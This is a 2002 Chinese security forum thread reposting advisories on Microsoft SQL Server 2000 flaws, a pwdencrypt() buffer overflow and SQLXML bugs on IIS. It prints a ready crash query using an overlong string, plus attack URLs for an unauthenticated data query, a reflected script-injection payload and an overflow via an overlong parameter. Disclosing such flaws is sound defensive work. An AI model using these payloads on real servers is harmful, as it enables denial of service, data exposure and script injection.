>> 欢迎您, 傲气雄鹰: 重登陆 | 退出 | 注册 | 资料 | 设置 | 排行 | 新贴 | 精华 | 管理 | 帮助 首页

  小榕软件实验室
  刀光雪影
  MS SQL2k边界检查错误允许攻击者远程执行代...
发表文章 发表涂鸦
  回复数:3  点击数:108 将此页发给您的朋友        
作者 主题: MS SQL2k边界检查错误允许攻击者远程执行代码 回复 | 收藏 | 打印 | 篇末
★帅の蟑螂帅哥哦
级别:管理员
威望:0
经验:20
货币:4114
体力:100
来源:127.0.0.1
总发帖数:3059
注册日期:2001-04-19
查看 邮件 主页 QQ 消息 引用 复制 下载 

MS SQL2k SQLXML边界检查错误允许攻击者远程执行代码(更新)
----------------------------------------------------------
为了明天奢侈糜烂的生活而奋斗
编辑 删除 发表时间发表于 2002-06-23.17:21:29  MSIE 6.0 Windows 2000IP: 已记录
★帅の蟑螂帅哥哦
级别:管理员
威望:0
经验:20
货币:4114
体力:100
来源:127.0.0.1
总发帖数:3059
注册日期:2001-04-19
查看 邮件 主页 QQ 消息 引用 复制 下载 

Microsoft SQL Server 2000 pwdencrypt() buffer overflow (MS,缺陷)

涉及程序:
Microsoft SQL Server 2000

描述:
Microsoft SQL Server 2000缓冲区溢出漏洞允许获取系统控制权

详细:
Microsoft SQL Server 2000有一个内置的散列函数,名为pwdencrypt()。
这个函数存在一个缓冲/堆栈溢出漏洞,允许攻击者发动拒绝服务攻击,使SQL Server崩溃,通过合适的方式构造shellcode,可能引起攻击者能以系统权限执行任何指令。

下面的例子通过超长字符串(353个字符A)将使SQL Server2000崩溃:
SELECT pwdencrypt(REPLICATE('A',353))
有的系统可能需要更长的字符串才能达到攻击效果,但1000个字符无论如何都足够让SQL Server崩溃了。


解决方案:
这个漏洞已经被微软公司证实,但尚未有正式的补丁程序发布,请关注微软安全公告。
俟正式补丁发布,CNNS将提供下载。

攻击方法:
下面的例子通过超长字符串(353个字符A)将使SQL Server2000崩溃:
SELECT pwdencrypt(REPLICATE('A',353))
有的系统可能需要更长的字符串才能达到攻击效果,但1000个字符无论如何都足够让SQL Server崩溃了。
----------------------------------------------------------
为了明天奢侈糜烂的生活而奋斗
编辑 删除 发表时间发表于 2002-06-23.17:23:18  MSIE 6.0 Windows 2000IP: 已记录
launze帅哥哦
级别:高级站友
威望:0
经验:0
货币:402
体力:15.4
来源:202.101.145.*
总发帖数:198
注册日期:2002-02-05
查看 邮件 主页 QQ 消息 引用 复制 下载 

攻击方法:
在URL包含如下字符串:
http://www.IIS-server.com/Northwind?sql=SELECT+contactname,+phone+FROM+Customers+FOR+XML
将返回一个XML文件,包含对数据库的访问查询结果。
执行 Scirpt site攻击:
http://www.IIS-server.com/Northwind?sql=SELECT+contactname,+phone+FROM+Customers+FOR+XML&root=<SCRIPT>alert(document.domain)</SCRIPT>
执行溢出攻击:
http://www.IIS-server.com/demos?sql=select+*+from+Customers+as+Customer+FOR+XML+auto&root=root&xsl=custtable.xsl&contenttype=超长字符串



----------------------------------------------------------
我现在成为了军人了,没时间上网了,有空上来就多支持了
编辑 删除 发表时间发表于 2002-06-23.17:28:46  MSIE 5.0 Windows 98IP: 已记录
launze帅哥哦
级别:高级站友
威望:0
经验:0
货币:402
体力:15.4
来源:202.101.145.*
总发帖数:198
注册日期:2002-02-05
查看 邮件 主页 QQ 消息 引用 复制 下载 

可惜对ms sql不熟悉,from?customers,customer是什么意思?
----------------------------------------------------------
我现在成为了军人了,没时间上网了,有空上来就多支持了
编辑 删除 发表时间发表于 2002-06-23.17:31:27  MSIE 5.0 Windows 98IP: 已记录
选择回复        
 快速回复主题: >>>高级模式
  用户名: 没有注册? 密码: 忘记密码?
记住密码
HTML语法
禁止IDB代码
禁止表情字符
[按 Ctrl+Enter 快捷键可直接提交帖子]
 投票评分: 共 0 票  
所有时间均为: 北京时间 ↑TOP 
关闭主题 拉前主题 移动主题 主题置顶 取消置顶 总固顶主题 取消总固顶 加入精华 移出精华 删除主题